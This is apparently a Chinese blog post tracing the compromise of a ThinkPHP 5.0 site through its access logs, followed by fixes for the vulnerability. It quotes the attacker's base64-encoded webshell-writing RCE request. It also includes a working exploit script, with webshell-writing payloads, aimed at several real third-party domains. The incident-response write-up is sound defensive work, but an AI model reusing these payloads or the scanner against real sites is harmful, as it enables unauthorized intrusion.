记录一个基于ThinkPHP网站被入侵到溯源的过程

昨天晚上，正准备入睡，朋友突然发消息说他的网站被黑客攻击了，首页内容被篡改，于是我开始了紧急的修复工作

知道这个情况后，立即翻身起来，让朋友发给我必要的信息，把网站的日志下载到本地，因为网站本身的访问量不是很大，所以直接使用 notepad++ 来手动分析。

0x01 下载必要文件

首先将日志文件、现在网站空间的源码以及之前的网站备份下载到本地，这一步是为了比较分析。

0x02 日志分析

从网站首页被篡改，可知道攻击者应该拿下了网站的权限，并上传了 webshell ，因此从攻击日志中查找网站非常规的访问URL记录。

发现如下的访问日志：

203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:46 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "POST //plus/mytag_js.php?aid=9527 HTTP/1.1" 301 178 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:48 +0800] "GET /plus/mytag_js.php?aid=9527 HTTP/1.1" 404 564 "http://pay.top15.cn//plus/mytag_js.php?aid=9527" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/asd.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/asd.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/asd.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/result.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/result.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/result.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/read.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/read.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/read.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //data/cache/flye.php HTTP/1.1" 301 178 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /data/cache/flye.php HTTP/1.1" 404 564 "http://pay.top15.cn//data/cache/flye.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //plus/moon.php HTTP/1.1" 301 178 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /plus/moon.php HTTP/1.1" 404 564 "http://pay.top15.cn//plus/moon.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //api.php HTTP/1.1" 301 178 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /api.php HTTP/1.1" 404 564 "http://pay.top15.cn//api.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lequ.php HTTP/1.1" 301 178 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lequ.php HTTP/1.1" 404 564 "http://pay.top15.cn//lequ.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //lx.php HTTP/1.1" 301 178 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /lx.php HTTP/1.1" 404 564 "http://pay.top15.cn//lx.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "POST //sb.php HTTP/1.1" 301 178 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /sb.php HTTP/1.1" 404 564 "http://pay.top15.cn//sb.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"
203.171.228.159 - - [30/Jan/2019:09:52:49 +0800] "GET /install/sss1.php HTTP/1.1" 404 564 "http://pay.top15.cn//install/sss1.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

看到这样的访问日志，很明显这是一个扫描器在扫描网站是否存在 webshell

查询ip：

可知，这是放在服务器上的扫描器

继续往下分析，时间顺序是从上往下增加的。

然后又发现一处集中扫描网站备份文件的日志记录：

117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /index.php?s=hits-show&sid=md5(1)%23&type=md5(1) HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:06 +0800] "HEAD /paytop15cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /paytop15cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:07 +0800] "HEAD /pay.top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /pay.top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:08 +0800] "HEAD /top15.cn.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.cn.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /top15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:09 +0800] "HEAD /wwwtop15.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /wwwtop15.sql.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /public_html.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.rar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:10 +0800] "HEAD /www.zip HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar.gz HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
117.152.74.243 - - [06/Feb/2019:10:27:11 +0800] "HEAD /www.tar HTTP/1.1" 404 0 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

查询IP结果如下：

想不到，小小的站点，攻击的人还挺多的，但是这些扫描基本都是徒劳的，网站上不存在这些内容，所以也不存在什么威胁（之后的几处地方也存在类似的扫描记录，正常访问的用户不多，倒是扫描器挺多的…⊙﹏⊙b汗）

网站的首页被改成了一串中文，那么在访问日志当中应当是存在的

在下载的网站文件 /public 目录下，发现如下情况

index.php 和 i.php ，乍一看，第二个文件很明显是 webshell 文件，然后到访问日志中，查找 i.php 这个关键词

OK，成功定位攻击日志

很明显，攻击者在简单访问几次后，便直接使用了 0day 攻击，系统基于 ThinkPHP5.0 ，因此由最近爆出的 ThinkPHP 几个 RCE 漏洞，可知攻击者直接利用了该漏洞。

113.103.115.134 - - [15/Feb/2019:17:26:04 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=eval(base64_decode(%27JGYgPSBmb3BlbigiaS5waHAiLCAidyIpOw0KJHQgPSAnPD9waHAgJGEgPSBiYXNlNjRfZGVjb2RlKFwnWVhOelpYSjBcJyk7JGEoJF9SRVFVRVNUW1wnaVwnXSk7Pz4nOw0KZndyaXRlKCRmLCR0KTsNCmZjbG9zZSgkZik7%27)) HTTP/1.1" 500 7345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36"

这个定位不是特别准确，但是也差不了多少了，真人概率 92% ，可以确定攻击者使用的应该是自家的电脑。

0x03 修复工作

既然是最新的漏洞攻击，之前也挺热的，毕竟让 程序员 加班几次了。

关于漏洞的分析，推荐文章《 ThinkPHP 5.0 & 5.1远程命令执行漏洞利用分析 》

通过该文章的分析，在源码中发现该程序基于 TP5.0 ，那么修复方法有其一，修改默认的 'var_pathinfo' => 's' ，把 s 修改成复杂的字符串，这个在 thinkphp/convention.php 文件中

其二，升级官方最新版本

其三，在 thinkphp/library/think/App.php 类的 module 方法的获取控制器的代码后面加上

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
    throw new HttpException(404, 'controller not exists:' . $controller);
}

0x04 写一个EXP：

简单写了一个 exploit ：

# -*- coding:utf-8 -*-
# name:tpKiller.py
# author: DYBOY
# description: ThinkPHP5 RCE的POC
# time: 2019-02-16

import requests
import re


"""
5.0.21,5.0.22：
写shell：http://example.com/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][1]=<?php @assert($_POST);?>

5.1.*:
写shell：http://example.com/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php @assert($_POST);?>

"""
# 检测存在漏洞的网址列表
target_urls =[
    'http://www.test.com',
    'http://www.meetppt.com',
    'http://www.jiyouche.com',
    'http://www.dfqy.com',
    'http://home.chegouguanjia.com',
    'http://www.aixuetuan.com'
    ]

# payload列表
poc_list = [
    '/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
    '/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1',
    '/index.php?s=index/\think\Request/input&filter=phpinfo&data=1',
    ]

def getHtml(url):
    """
    获取网页内容
    param: url
    return str
    """
    html = requests.get(url)
    html.encoding = 'utf-8'
    return html.text

def checkBug(url):
    """
    验证是否存在RCE漏洞
    param: url
    return None
    """
    for index,poc in enumerate(poc_list):
        result = getHtml(url+poc)
        if(result.find('www.php.net') > 0):
            print("当前URL："+ url+" 存在ThinkPHP5 RCE 漏洞！\nPOC编号: "+str(index+1))
            break

def attack(urlList):
    """
    开始检测
    param:urls(<type:list>)
    return None
    """
    for url in urlList:
        checkBug(url)

# 主程序
if __name__ == '__main__':
    attack(target_urls)

0x05 总结

12月份就爆出 ThinkPHP 的 RCE 漏洞，年底，许多公司都在忙着财务、公司年会等事情，缺少了对网站安全的一个检查维护，却不知道，在网上一些“黑客”或者“黑产团队”已经开始了批量获取 webshell 的入侵等违法活动，因此各大公司或是个人站长，都需要时刻关注互联网安全动态，及时做好安全防护升级工作。